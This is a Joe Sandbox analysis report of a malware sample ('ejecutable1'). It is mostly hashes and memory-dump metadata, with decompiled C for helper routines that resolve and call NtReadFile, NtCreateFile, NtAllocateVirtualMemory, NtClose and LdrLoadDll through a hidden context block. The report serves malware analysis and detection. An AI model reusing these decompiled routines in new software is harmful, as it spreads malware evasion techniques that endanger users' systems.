                                                                    • Instruction ID: 0212af2ccc31c213dd5dc09098ac537d41dcb32c3d3f2d82deaf36ac0783d267
                                                                    • Opcode Fuzzy Hash: 3acffc100928a4da7c571b3c49d438d34e6b07555fd595e42b9687885580258c
                                                                    • Instruction Fuzzy Hash: B621C275604208EFDB15DF60E9C4B26BBB5FF84314F24C9A9E84E4B246C336D847CA61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405762675.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_17d000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f8a2afec85db30593ed402b97664c6ebc74f15f1f07b91588eae24285e826690
                                                                    • Instruction ID: b473ec78adba145033f6fc4c21941d30c6981b54e8da0b0ca5c00cc64e38045f
                                                                    • Opcode Fuzzy Hash: f8a2afec85db30593ed402b97664c6ebc74f15f1f07b91588eae24285e826690
                                                                    • Instruction Fuzzy Hash: 0F21C275604248DFDB14DF64E984B16BB75FF84314F24C9A9E84E4B246C336D847CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f6342aebbefa6268f8c232cd1d0ccd2eb2afc3782d0cbdc3c48a650ef213a88e
                                                                    • Instruction ID: d6577d01e8d61a01b555b56b461619a167ec3a7858ea3829d7d6c7484b0c7ef0
                                                                    • Opcode Fuzzy Hash: f6342aebbefa6268f8c232cd1d0ccd2eb2afc3782d0cbdc3c48a650ef213a88e
                                                                    • Instruction Fuzzy Hash: A4310678D042098FCB04CFA5D8455EEBBB6FF89310F10846AD904B7361DB341995CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c7427ac48c7714958a65ad0c5737bd68e76c1f01dc68c13695502d4c4e4d0d7a
                                                                    • Instruction ID: dfccb241d2252dca41963e20de6c4941af514c14cdcb88ba1e18e3f1e1045797
                                                                    • Opcode Fuzzy Hash: c7427ac48c7714958a65ad0c5737bd68e76c1f01dc68c13695502d4c4e4d0d7a
                                                                    • Instruction Fuzzy Hash: 7C21F378E102099BCB04DFA5D8889EEBBB6FF88310F10842AD919B3350DB345991CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0462a45a681fdad9cc90d29301b6cf2327ecdaf14464b5ad2d841fbca4458a21
                                                                    • Instruction ID: c31f90de6117b1d9121557d08bb47c28c21c5e3990d4fcb856e355d35fe629ac
                                                                    • Opcode Fuzzy Hash: 0462a45a681fdad9cc90d29301b6cf2327ecdaf14464b5ad2d841fbca4458a21
                                                                    • Instruction Fuzzy Hash: 9021F334E142098BDB04DFA5D9056EEBBF6EF89300F14846AD419A7261EB345A51CFA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405762675.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_17d000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ffed2e78bcc5e198d6b2c2fdec07d241800434202eba1f8a8a2a8b73ced0c56b
                                                                    • Instruction ID: 4a0e3a24c95d5cf0cef253fd5f6bd795b5b4c3ba7800a1057e6fc601cd4ec31e
                                                                    • Opcode Fuzzy Hash: ffed2e78bcc5e198d6b2c2fdec07d241800434202eba1f8a8a2a8b73ced0c56b
                                                                    • Instruction Fuzzy Hash: 74215B755093848FCB12CF24D994B15BF71EF46314F28C5EAD8498B6A7C33A984ACB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405762675.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_17d000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dc67c3a9fbf8d8e039c43f99312ce4261974722c27e4e0709c7fa083e3c21303
                                                                    • Instruction ID: 4972bf452d951ac56e769b7b85863f6adb19bd1a897604cdd32f34aaf97b1f14
                                                                    • Opcode Fuzzy Hash: dc67c3a9fbf8d8e039c43f99312ce4261974722c27e4e0709c7fa083e3c21303
                                                                    • Instruction Fuzzy Hash: 84118B75544284DFCB12CF10E5C4B15BFB1FF85314F28C6A9D8494B656C33AD84ACB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 85abe972481684fd84bba7942813abac1531a19122cf54fe2080a5f52b18a2a2
                                                                    • Instruction ID: c5088ce036fa5b9d9f05a8d35dd05337493cc0d9b10c1011d866087980f65ce0
                                                                    • Opcode Fuzzy Hash: 85abe972481684fd84bba7942813abac1531a19122cf54fe2080a5f52b18a2a2
                                                                    • Instruction Fuzzy Hash: B3110670D1824A9FDB98CFBA89402AEFBF5AB49300F15D1AAD40CE6211E7345A91CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405747374.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_16d000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 54dfd2180eb03c618761345114cdf492081c2fe512380c8c0ffe715ce1151c4d
                                                                    • Instruction ID: 2a5ea10302089ae5731f693d60e9aaf32af82080d82a2dd3955a0224207da51e
                                                                    • Opcode Fuzzy Hash: 54dfd2180eb03c618761345114cdf492081c2fe512380c8c0ffe715ce1151c4d
                                                                    • Instruction Fuzzy Hash: 6501DB31A083549BDB144A65ECC4BABBFDCEF51324F14C56AED451B282C374DC50CAB1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5e74a230923c9f7267e6bf80c025e96a1d1ad3cc872461a78dc6545299a3ac76
                                                                    • Instruction ID: 06a51ac146573e7fa056556da0969c711b445e3a7fa5d7c5278d841173f06b22
                                                                    • Opcode Fuzzy Hash: 5e74a230923c9f7267e6bf80c025e96a1d1ad3cc872461a78dc6545299a3ac76
                                                                    • Instruction Fuzzy Hash: F61150B8D1412ACBCB61CF54D940BE8BBB0AF68350F1080E5995EA7600E6B05AD09F54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0fc643665fcbda5ffe8c1515dec9d2dfea6c0a6e404d49fffdd81c236c2c0eb3
                                                                    • Instruction ID: 200629fcc2e34e185567d3c2880b5404e9cdfa940d2785d1fd88ad26a1e759e6
                                                                    • Opcode Fuzzy Hash: 0fc643665fcbda5ffe8c1515dec9d2dfea6c0a6e404d49fffdd81c236c2c0eb3
                                                                    • Instruction Fuzzy Hash: 5101E5B4D1520A9FCB44DFA8C5859AEBBF5EF48304F20886AD908A3350D7705A50CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405747374.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_16d000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: daffb4bb4fe1d42fc2144d5c752a859e73da56b9bccc0dd68eebeb38ea094f2c
                                                                    • Instruction ID: 06d179cfe5e3be339b6e5d9a79c096da627c1c936fd90fc218c72e9cd9c8ca1b
                                                                    • Opcode Fuzzy Hash: daffb4bb4fe1d42fc2144d5c752a859e73da56b9bccc0dd68eebeb38ea094f2c
                                                                    • Instruction Fuzzy Hash: 83F04F72504254ABEB108A15DCC8B66FF98EB91724F28C55AED485B282C3789844CAA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
Non-executed Functions

Strings
Execution Graph

Execution Coverage: 4%
Dynamic/Decrypted Code Coverage: 2.4%
Signature Coverage: 6%
Total number of Nodes: 584
Total number of Limit Nodes: 71

Graph


                                                                    Executed Functions

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 418680-4186c9 call 4191d0 NtReadFile
                                                                    C-Code - Quality: 37%
                                                                    			// Wrapper around NtReadFile: the first argument is the malware's context block;
                                                                    			// the API pointer is kept in the slot at offset 0xc48 and is resolved on demand
                                                                    			// (E004191D0 with id 0x2a) before the call is made through it.
                                                                    			E00418680(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                                    				intOrPtr _t13;
                                                                    				char* _t4;
                                                                    				char* _t6;
                                                                    				char* _t12;
                                                                    				void* _t18;
                                                                    				void* _t27;
                                                                    				intOrPtr* _t28;
                                                                    
                                                                    				_t13 = _a4;
                                                                    				_t28 = _a4 + 0xc48; // slot holding the resolved NtReadFile pointer
                                                                    				E004191D0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a); // resolve if still empty
                                                                    				_t4 =  &_a40; // 0x413a21
                                                                    				_t6 =  &_a32; // 0x413d62
                                                                    				_t12 =  &_a8; // 0x413d62
                                                                    				// indirect call: NtReadFile(FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock, Buffer, Length, ByteOffset, Key)
                                                                    				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                                                    				return _t18;
                                                                    			}







                                                                    APIs
                                                                    • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID: !:A$b=A$b=A
                                                                    • API String ID: 2738559852-704622139
                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                    • Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                    • Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 278 409b30-409b59 call 41af60 281 409b5b-409b5e 278->281 282 409b5f-409b6d call 41b380 278->282 285 409b7d-409b8e call 419710 282->285 286 409b6f-409b7a call 41b600 282->286 291 409b90-409ba4 LdrLoadDll 285->291 292 409ba7-409baa 285->292 286->285 291->292
                                                                    C-Code - Quality: 100%
                                                                    			// Module loader: builds the module name into a local buffer, looks the module up
                                                                    			// in the already-loaded list (E00419710) and falls back to LdrLoadDll only when
                                                                    			// it is not yet mapped.
                                                                    			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                    				char* _v8;
                                                                    				struct _EXCEPTION_RECORD _v12;
                                                                    				struct _OBJDIR_INFORMATION _v16;
                                                                    				char _v536;
                                                                    				void* _t15;
                                                                    				struct _OBJDIR_INFORMATION _t17;
                                                                    				struct _OBJDIR_INFORMATION _t18;
                                                                    				void* _t30;
                                                                    				void* _t31;
                                                                    				void* _t32;
                                                                    
                                                                    				_v8 =  &_v536;
                                                                    				_t15 = E0041AF60(_a8,  &_v12, 0x104, _a8); // fill the name buffer (MAX_PATH chars)
                                                                    				_t31 = _t30 + 0xc;
                                                                    				if(_t15 != 0) {
                                                                    					_t17 = E0041B380(__eflags, _v8);
                                                                    					_t32 = _t31 + 4;
                                                                    					__eflags = _t17;
                                                                    					if(_t17 != 0) {
                                                                    						E0041B600( &_v12, 0);
                                                                    						_t32 = _t32 + 8;
                                                                    					}
                                                                    					_t18 = E00419710(_v8); // already loaded?
                                                                    					_v16 = _t18;
                                                                    					__eflags = _t18;
                                                                    					if(_t18 == 0) {
                                                                    						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed; module handle returned in _v16
                                                                    						return _v16;
                                                                    					}
                                                                    					return _t18;
                                                                    				} else {
                                                                    					return _t15;
                                                                    				}
                                                                    			}














                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                    • Instruction ID: b92050b7f429726503c7e4e061a3d159fecf728551aa670371b369b3bbcc7e54
                                                                    • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                    • Instruction Fuzzy Hash: 800112B5D4010DA7DB10DAA5DC42FDEB378AB54308F0041A5E918A7281F675EB54C795
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 293 4185d0-418621 call 4191d0 NtCreateFile
                                                                    C-Code - Quality: 100%
                                                                    			// Wrapper around NtCreateFile: resolves the API pointer kept in the context
                                                                    			// block at offset 0xc40 (E004191D0 with id 0x28), then issues the call.
                                                                    			E004185D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                    				intOrPtr _t3;
                                                                    				long _t21;
                                                                    				void* _t31;
                                                                    
                                                                    				_t3 = _a4 + 0xc40; // 0xc40
                                                                    				E004191D0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                    				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                    				return _t21;
                                                                    			}






                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                    • Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                    • Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph (executed / not executed blocks): control_flow_graph 296 4187b0-4187c6 297 4187cc-4187ed NtAllocateVirtualMemory 296->297 298 4187c7 call 4191d0 296->298 298->297
                                                                    C-Code - Quality: 100%
                                                                    			E004187B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                    				long _t14;
                                                                    				void* _t21;
                                                                    
                                                                    				_t3 = _a4 + 0xc60; // 0x8bec97b5
                                                                    				E004191D0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                    				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                    				return _t14;
                                                                    			}





                                                                    Addresses: 0x004187bf, 0x004187c7, 0x004187e9, 0x004187ed

                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                    • Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
                                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                    • Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph (executed / not executed blocks): control_flow_graph 299 4187aa-4187ed call 4191d0 NtAllocateVirtualMemory
                                                                    C-Code - Quality: 79%
                                                                    			E004187AA(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                    				long _t15;
                                                                    				void* _t22;
                                                                    
                                                                    				_t11 = _a4;
                                                                    				_push(0xc73fa1d4);
                                                                    				_t3 = _t11 + 0xc60; // 0x8bec97b5
                                                                    				E004191D0(_t22, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                    				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                    				return _t15;
                                                                    			}





                                                                    Addresses: 0x004187b3, 0x004187b9, 0x004187bf, 0x004187c7, 0x004187e9, 0x004187ed

                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: bdf474fc00807c62b8a81943fbc1735e4ac1a6dad9ecc420056a1c15aeebe8c7
                                                                    • Instruction ID: 9f18913c34982a5a24f240f689ab26c97c0e9d0139fd41c8860d9d59ddfd995b
                                                                    • Opcode Fuzzy Hash: bdf474fc00807c62b8a81943fbc1735e4ac1a6dad9ecc420056a1c15aeebe8c7
                                                                    • Instruction Fuzzy Hash: F7F030B51041496BCB14DF98DC84CA777A9BF88254B15868DFD4C97202C234EC55CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E004186FA(void* __ecx, void* __edi, void* _a4) {
                                                                    				intOrPtr _v0;
                                                                    				long _t10;
                                                                    				void* _t21;
                                                                    
                                                                    				 *((intOrPtr*)(__edi + 0x55708ccb)) =  *((intOrPtr*)(__edi + 0x55708ccb)) + _t21;
                                                                    				_t7 = _v0;
                                                                    				_t4 = _t7 + 0x10; // 0x300
                                                                    				_t5 = _t7 + 0xc50; // 0x409753
                                                                    				E004191D0(__edi, _v0, _t5,  *_t4, 0, 0x2c);
                                                                    				_t10 = NtClose(_a4); // executed
                                                                    				return _t10;
                                                                    			}






                                                                    Addresses: 0x004186fb, 0x00418703, 0x00418706, 0x0041870f, 0x00418717, 0x00418725, 0x00418729

                                                                    APIs
                                                                    • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 6ad741b659345e5b263686d54fd2c7e4e0509bd277aa89ea0b5f1953d09f1899
                                                                    • Instruction ID: 2f4c18f98c9d2f34f70f130a40185be8465225ee33dfa39a4fb647e3a91c4c75
                                                                    • Opcode Fuzzy Hash: 6ad741b659345e5b263686d54fd2c7e4e0509bd277aa89ea0b5f1953d09f1899
                                                                    • Instruction Fuzzy Hash: 0DE08C71240304BBE714EB98CC4AED777A8EF48760F04409AFA089B242C634FA008AE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00418700(intOrPtr _a4, void* _a8) {
                                                                    				long _t8;
                                                                    				void* _t11;
                                                                    
                                                                    				_t5 = _a4;
                                                                    				_t2 = _t5 + 0x10; // 0x300
                                                                    				_t3 = _t5 + 0xc50; // 0x409753
                                                                    				E004191D0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                    				_t8 = NtClose(_a8); // executed
                                                                    				return _t8;
                                                                    			}





                                                                    Addresses: 0x00418703, 0x00418706, 0x0041870f, 0x00418717, 0x00418725, 0x00418729

                                                                    APIs
                                                                    • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                    • Instruction ID: 315d70e0dd0a86a48429d20d502ae4ae3fb499c677b3512a188e9811668946a9
                                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                    • Instruction Fuzzy Hash: 17D01776200218BBE714EB99CC89EE77BACEF48760F154499BA189B242C570FA4086E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                    • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                    • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                    • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
